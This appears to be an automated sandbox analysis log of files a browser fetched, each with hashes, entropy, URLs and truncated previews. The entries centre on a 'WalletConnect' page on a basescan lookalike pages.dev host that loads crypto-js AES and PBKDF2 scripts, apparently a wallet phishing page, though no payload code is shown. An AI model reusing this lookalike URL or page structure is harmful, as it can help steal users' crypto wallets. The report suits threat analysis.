                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1217)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1218
                                                                                                                                                                                                                                              Entropy (8bit):5.3580757746970455
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:FtN9QGdGGpNpZhJqN7dODRFLbEicAoQ2XjjWSy9xnKUoRcCcBIYwWWMFA:v3QGdGGpNpZhJqNuXytZjAnKRRgUiA
                                                                                                                                                                                                                                              MD5:320400CCDD35FC2B63F1C8801B9E7572
                                                                                                                                                                                                                                              SHA1:E069BF9BEA8DA9257C43D28DE3F5E8564C44DF26
                                                                                                                                                                                                                                              SHA-256:B3FC7C2706E4C693E6AE626BBE46EADAFD3AAAD2E6A4CC0BB4FE4CE37606D92B
                                                                                                                                                                                                                                              SHA-512:533BE540B0A6499EE451DE018B46F94398B895432B2A9BB1905860AAA0156165F3550051107DA481A099B8E7AFB394FC517F2A6CD83ABCB86206616AE5CABC0A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/createHasNewUserSpin-80b2817f.js
                                                                                                                                                                                                                                              Preview:import{h as i,e as t,$ as h}from"./manifest-51a3674f.js";import{j as b,b as v,r as U}from"./solid-js-38561dfe.js";import{h as S}from"./http-f4555b94.js";import{b as A}from"./index-adb8672d.js";function P(e){var n=e==null?0:e.length;return n?e[n-1]:void 0}var w=(e=>(e[e.rollAvailable=0]="rollAvailable",e[e.rollPending=1]="rollPending",e[e.rollUnavailable=2]="rollUnavailable",e))(w||{}),a=(e=>(e[e.Claimed=1]="Claimed",e[e.UnClaimed=0]="UnClaimed",e[e.NoReward=-1]="NoReward",e))(a||{});const s="before-user-login-type",l="user-new-spin-finished",I=()=>{localStorage.setItem(l,"true")},F=()=>localStorage.getItem(l),[H]=b(()=>S.get("/account/device/isRegistered")),C=()=>{const[e]=A.checkUserClaimedFreeMoney({enable:()=>i.login}),n=t.initSearchParams.get("spin"),[c,o]=v(!1);return U(()=>{if(e.loading)return;function g(){return e()===a.UnClaimed}function d(){const r=localStorage.getItem(s);if(r)return r;const{isNgHost:f,isIdHost:m}=h.getHostType(t.host);return m||f?"B":Math.random()>.5?"A":"B"}
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 400x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1962
                                                                                                                                                                                                                                              Entropy (8bit):7.877830420854902
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:LcfUL6ppoQrXErVbZtsnlE6OawsMG5EuMOr1mD4QLa:LcfULB6UrHCnlelsmH+
                                                                                                                                                                                                                                              MD5:FC47577F72C6AC1B3644FD3C93C35434
                                                                                                                                                                                                                                              SHA1:7FA10148EB871D0CA72A79A89AE480A44AF8014B
                                                                                                                                                                                                                                              SHA-256:A96683AF833D7E9409BEA1D240842F89A6117C323FF048B484A23FEA13CCB61E
                                                                                                                                                                                                                                              SHA-512:07759BD845B5B7B820312F55DE4B09F4ECF25D1613811DC85388C6C18DFF36B6DA58B66565772CDE0121D6B859C0078FE6CD445A9B1D0F5B0DFEBED61B1798C9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://api.web3modal.com/public/getAssetImage/692ed6ba-e569-459a-556a-776476829e00
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8 .....N...*....>I$.E..!.]..(....p...q..|.......7.3;.D.`...|..:.g./.T.CL.e....i...AS..3..*s..|'4.B..Nt4.^....=.........AS..3...x3.IB..p...9..=......J...*.bw.AS..3.......<...i.Yg./.T.C=.0doa...v.YS].z..*p.c->I..G?..x...2..Ns.n....}.Rur..s&.v..maF"-b..+.U.K....z.i..XP4......NN..Ga.(F.m1.+.U..=c.{...*..C=.{....A...*sb....x.;.w". .....t..../.T.......5..Y.3E.%....P.............RXm.Nf}.g./.$I.0....Z.=......Wx...zN.......T.'..H.Bf.u9..>..;v.7....9..../.(c.>...).9..>.|mI....Gp...ixC...7U.L.e....AW.`............|2..Q(H..O.O.. f.F....i...AB..l..._&.3ON.|..:.g./....F..g./.T.CL.e....i...AS..3..*s..|2..Nt4.........A&.....Q..d.O....v%.f..PD....4B.a.w.y.w.. .C...P......YCjq...8..{<p6.c... .u.#. ..HW...FxL...*f..9.s.2.O.c_FXCd.....z..N..=c..<.4.ie.E..4........LZ..+=F......E.."...:!4..4h...qq.w(q@..2"...BR eg....;...2...........e.H...P..3z...!....`..?2.'....P......._>.........../.HS.....u...+..6...j_.6...^..y.....Y=. .6..7.m2U..'.f!....o.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):71
                                                                                                                                                                                                                                              Entropy (8bit):4.8011752045489855
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:JS4vILCzRIB2DJCyzAxZYevn:DIO9IB2DJCysxZzv
                                                                                                                                                                                                                                              MD5:9A5A5A6DFD8AD7CDE965EE442363AA29
                                                                                                                                                                                                                                              SHA1:13C5A93B37D0A7A4E4B5264CBADB88E69CBF06E2
                                                                                                                                                                                                                                              SHA-256:FE95E60293426828CB30C69A7C59816FC20B25A1B95F70FD88B5B41FF6CE3838
                                                                                                                                                                                                                                              SHA-512:A9DA2B9C2BA8025A936398EC8E3DCA2EAEB6F7667A00379F248B4321087BF0F9E1B707A6A63ECE71462FE9BE4D979989419D8B8343896F50EDA608BD8E0FDED4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{W as t}from"./manifest-51a3674f.js";const p=t();export{p as h};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):150
                                                                                                                                                                                                                                              Entropy (8bit):5.016984404505585
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:YGKEVUJ9WHZQaTi+Q5OTRvhCgXRLMVWoO0Hb+PCvFRW6X05DBx4n:YGKr055QQTRpVBuzONC7fk5DX4
                                                                                                                                                                                                                                              MD5:DA1EBF2F5F358CDEED11068E8885E63C
                                                                                                                                                                                                                                              SHA1:113200827E7AD10927502FF69DE1353C36CE3AFB
                                                                                                                                                                                                                                              SHA-256:420E19DAD0A9AB2F5AE9952557623B1842AF06EC7793D07229B115F23BDC1736
                                                                                                                                                                                                                                              SHA-512:0AE294BF8A1ABDC3980C6A803689D2C4307141E9C7C40BC82F4E8357D6862EE146F5EE8E1A7128F441B7BF722A7E675BFC99D150E2DF82634A31AC432568CFB8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:{"code":9101,"message":"\u65e0\u6743\u9650\u64cd\u4f5c(invalid organization or service not avaliable)","requestId":"237863446c258ce8eaeb1ff173b29d42"}
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):142094
                                                                                                                                                                                                                                              Entropy (8bit):7.995334901308822
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:3072:C3TYLNjuScdNnt+TpQjHFKIpLzIEQBdui8OoSj8mkHgIje11qRDeXt:CDTSc3AT2b7pnI5Bduiwmks1qUt
                                                                                                                                                                                                                                              MD5:6565DC2A1A11B15292ABC1443F67231D
                                                                                                                                                                                                                                              SHA1:A59A8E9BF0BFBB77718CD98E14559407674D085D
                                                                                                                                                                                                                                              SHA-256:34476EF42C9794670201498228F63B4EE1797D61A94D77FE5D531B5F744C69AB
                                                                                                                                                                                                                                              SHA-512:A5692CC13C8515DEC1D82BE937D30BA70B88415D97FB6B7843E78D477E44CC150882EB7F3C574FBA1F38D619A1A4B3B8BA342F53FD39CD3D2517C7B56F3397BD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/lottery-BgL2Ay0X.png
                                                                                                                                                                                                                                              Preview:RIFF.+..WEBPVP8L.*../?.......G.TR..{.$...Ar.B>.Cu..).8.$)....I._..N#q.+..rl.m..?..K..}.h..t.9.DR...pk. .....]l..>/3.Jit..H.TN:...V..W^....|.5qIL"I?~...Od.G.Ex...4...b..b..".d...R#.b.D...>"..b.t.,..T9.-h.NLS&R.LW...C'..y....`T. .|...V..|....0....(..;.........P..8j.M@..&.w&......3.'.(/...+....8W0.Sg....*..O.$....!.......Ex.?....LE..W".M...O...]H.?+.T4>Z..a..).VC.M.O?.........q........3.4......JY.~Z..iZG'..pp.p?...D...W.....}. ....G....bB...9..^.z.c..F0{.D.his.f.9.g.Tx..o?.i(..c.,~..Y...:..u.....$I........?.$.f....$........)xh...O...5./.&@.j..p...m`'.q.........o.....}..k..NV..nw.Vg.l%I...;.u...T..dlU&.t..p..~...xL.....6........nq....;w_...?g..q.m .r...3.=.1"&...;..*........V.u.?...Y.....>.q.;....-.x.G...p3............\.-..E.....h.lV......./..h+...(......~7..*.U.}...X...X..[A,."p.:.*n*k..zc@J.@.L..........A.(/ufA.V..@Y..Ruf\[*.Y._.l.V..$x..A.c..:7.k......K.EHB.*..J....4.ZUHX.....J.@.V%.z."J.^.r@5I.|h...K~.....9..."...........x.....4.|r.1...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 378 x 110, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2293
                                                                                                                                                                                                                                              Entropy (8bit):7.876013522052108
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:eYxUWxcWDjLiVjqiwJohG+2dKp0a5YREH3PHI8cqrXf:HxpCWDj6qvJor2dU0OHfo8jTf
                                                                                                                                                                                                                                              MD5:6154481B33B7DBEE3E7B1106D029BBAB
                                                                                                                                                                                                                                              SHA1:9BC0307324D867B2AD4AF113FCD30BA8DDD7A7ED
                                                                                                                                                                                                                                              SHA-256:20557CE751C85C241E79317C1C68AFF429692AE4D74AB289588823854FC2B57D
                                                                                                                                                                                                                                              SHA-512:A110BD4A76FA6D2AC5B2E030A4A71FFA348E78FBCF4F293BE2CF5DAF9398AD81A0F2FC809D68C6ADCC81C87D7DED409DD87D3D5788C4AF30086A92688030103F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...z...n......N(....?PLTE................................................................tRNS.. 0@PP`opp...........9....QIDATx... ....u.D.}.g...N..A.f,9.~......../..M..i...m(....8M.I.....(.;...E..."....X.r{...zf'..K='....3..e'......|S...b...E...F...O..0......v B.R.nj(p.9.d.y.zW..=g$.[].~.`..v.....C.V.........3....du.F..{.d.sT...x...G...MF^#a.D...>.....8.."~.d.sH.<.`.2.A...u.W.xm 5/O.....w.........a.V..f].."2...L..N~.zp.M;.......O.....'.q |.9..y.y.A}-\.kY...5....Q....o8..-.CS...%...D.K}.2</.8.${.E.G.....J;.G............HT}.c.z5....._r.J'....7Y..R8....X.Tm.\......6.`.o..#..5..=..J\D...G...Sp#Z..F..zr#.8S..O..m.L.........:Q.>..?........(..Ra.gko.2...;.a...w..;"....t...^.......T...N.)...........}...D./..l........0...:..`5...z...@o.u..'T.(..P..kF.... ...Z.R.~.^{.J&m..u.].T...G...vk..I...Q..u.g.).....z...?.3.nR.S..3.p..W.....;.%GU .C.R`.....[35{.ihQ.d6..i..>."..."........[.h7..U..=d....d.....,..B..V=.V..|@k._(z...F
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4038
                                                                                                                                                                                                                                              Entropy (8bit):5.24220398742376
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:a5fiuqPPpPhQo4kLLu7FeDrlIuesOAGu6FLn/w+1hov1jsUpT08ehNdUL+OuFWr:yiuqPPpPhQLkLy7FeDrlIuesOA36FL/W
                                                                                                                                                                                                                                              MD5:CD899D8FA526AB056A475CB2916BC127
                                                                                                                                                                                                                                              SHA1:26AA11936430C8D8E7F26F258F24CD23CEAF8470
                                                                                                                                                                                                                                              SHA-256:152381818CD0A78B6798BE3FF153D8DA8F879FFB44B49A5961E9FD5B5EE849A1
                                                                                                                                                                                                                                              SHA-512:CF33CAE28ED233FB63203A8F2F99FB765ADD7984F7C2679117778AC2BBEB3542D7673687B5036A1AB7896224260ECB4DFABE8A846CC911349664490EDA03D0FE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 22.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Layer_1" xmlns:ev="http://www.w3.org/2001/xml-events"... xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 318.6 318.6"... style="enable-background:new 0 0 318.6 318.6;" xml:space="preserve">..<style type="text/css">....st0{fill:#E2761B;stroke:#E2761B;stroke-linecap:round;stroke-linejoin:round;}....st1{fill:#E4761B;stroke:#E4761B;stroke-linecap:round;stroke-linejoin:round;}....st2{fill:#D7C1B3;stroke:#D7C1B3;stroke-linecap:round;stroke-linejoin:round;}....st3{fill:#233447;stroke:#233447;stroke-linecap:round;stroke-linejoin:round;}....st4{fill:#CD6116;stroke:#CD6116;stroke-linecap:round;stroke-linejoin:round;}....st5{fill:#E4751F;stroke:#E4751F;stroke-linecap:round;stroke-linejoin:round;}....st6{fill:#F6851B;stroke:#F6851B;stroke-linecap:round;stroke-linejoin:round;}....st7{
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):414
                                                                                                                                                                                                                                              Entropy (8bit):4.847232375139823
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YWTOMEEM3t7uOJbGSsWGNpfbpWDR79i8eYez1XJRaSR79S6VezwSR79S6Vezwy:YEOMEFtHJuW001U8ejJsy86ly86ly
                                                                                                                                                                                                                                              MD5:34F2D328564D8408BC8F538C39395B17
                                                                                                                                                                                                                                              SHA1:DB61156C5B72999A5BCCD8F7882C5F037DAC3B9E
                                                                                                                                                                                                                                              SHA-256:C489ECAD8512CECA0AB034DF7134E7792E36138B238CA138E6F7A0F816FF61A1
                                                                                                                                                                                                                                              SHA-512:49A7475AF45DE5AB2244B544DE0964AB406DFA014B3B885C7212D0CB4C23ACECD8B3E537389B76E3A5EC97882683B17BE36CEDB7901370420C88B2102C811262
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/manifest.webmanifest
                                                                                                                                                                                                                                              Preview:{"name":"BC.GAME","short_name":"BC.GAME","start_url":"/","display":"standalone","background_color":"#24262b","lang":"en","scope":"/","description":"BC.GAME","theme_color":"#24262b","icons":[{"src":"android-chrome-192x192.png","sizes":"192x192","type":"image/png"},{"src":"android-chrome-512x512.png","sizes":"512x512","type":"image/png"},{"src":"android-chrome-512x512.png","sizes":"512x512","type":"image/png"}]}.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1451)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1452
                                                                                                                                                                                                                                              Entropy (8bit):5.246608575210582
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:uiIGrFJ1zZF/3d1ulHFxkpcdFqnDkp8NFeDkpFFukZnG:u6H19F/3diFxkWdF8kcFOkbFukZnG
                                                                                                                                                                                                                                              MD5:069C20C840DEFE3A9D1B036DDCAB667C
                                                                                                                                                                                                                                              SHA1:C3E0B336F38ECDF126D66F7AA3E20E98A290F8D9
                                                                                                                                                                                                                                              SHA-256:96030013A01186E4FFC9AA55CCF805BE1AB851E34E62A370804A499B078DFE56
                                                                                                                                                                                                                                              SHA-512:B6ABF5F1FEECEA986207F00C392DD4832705BDA8495AE58A3081532EA5E637A159997D703F78DB97FD19F6479252D08C997906A55C28126C1C2832AA210C77CC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{h as l,k as s,t as n}from"./solid-js-8ff414d5.js";import{c as i}from"./countries-18533370.js";import{b as a}from"./lottery-9c791aba.js";var p=n('<section class="relative min-w-[24px] min-h-[24px] w-[24px] h-[24px] overflow-hidden border border-solid border-third rounded-full"><img class="w-[24px] min-w-[24px] absolute"alt="">'),u=n('<section class="relative min-w-[16px] min-h-[16px] w-[16px] h-[16px] overflow-hidden"><img class="w-[16px] min-w-[16px] absolute"alt="">'),m=n('<section class="relative w-[64px] min-h-[64px] h-[64px] overflow-hidden"><img class="w-[64px] absolute"alt="">'),c=n('<section class="relative min-w-[48px] min-h-[48px] w-[48px] h-[48px] overflow-hidden"><img class="w-[48px] min-w-[48px] absolute"alt="">');function d(o){return(()=>{var r=p(),t=r.firstChild;return l(t,"src",i),s(e=>(e=a(o.country,1))!=null?t.style.setProperty("top",e):t.style.removeProperty("top")),r})()}function f(o){return(()=>{var r=u(),t=r.firstChild;return l(t,"src",i),s(e=>(e=a(o.country
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2829), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2829
                                                                                                                                                                                                                                              Entropy (8bit):5.138132157470483
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:9GC4Us/cAAWDlDakNn7MrtDMEMKRS+EyK6yK4QP/779KD/OC:wos/Z5llENvVSfZ6Zhn7EOC
                                                                                                                                                                                                                                              MD5:AE0FAC465E284342BA8B74266F26B3A7
                                                                                                                                                                                                                                              SHA1:F77E04258A7908B7669EC561D67AE9EC81220D23
                                                                                                                                                                                                                                              SHA-256:FD6DE52714532EF0E51F17C151B185A24A157E15DA25A5551ECE557674667B86
                                                                                                                                                                                                                                              SHA-512:3698791CB2FD25AB8EEC2C26D340E4BDC380B04368E7E97CF74AD7717EC8D7186AC5497537E4B27D3B5E3203AEA563F17203A5A244EA82C710381D51C9CB2D76
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/js/components/hs.cubeportfolio.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore.components.HSCubeportfolio={_baseConfig:{},pageCollection:$(),init:function(selector,config){this.collection=selector&&$(selector).length?$(selector):$();if(!$(selector).length)return;this.config=config&&$.isPlainObject(config)?$.extend({},this._baseConfig,config):this._baseConfig;this.config.itemSelector=selector;this.initCubeportfolio();return this.pageCollection;},initCubeportfolio:function(){var $self=this,config=$self.config,collection=$self.pageCollection;this.collection.each(function(i,el){var $this=$(el),setControls=$this.data('controls'),setLayout=$this.data('layout'),setXGap=$this.data('x-gap'),setYGap=$this.data('y-gap'),setAnimation=$this.data('animation'),setCaptionAnimation=$this.data('caption-animation'),setLoadMoreSelector=$(this).data('load-more-selector'),setLoadMoreAction=$(this).data('load-more-action'),setLoadItemsAmount=$(this).data('load-items-amount'),setDefaultMediaQueries=[{width:1500,cols:3},{width:1100,cols:3},{width:800,c
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css
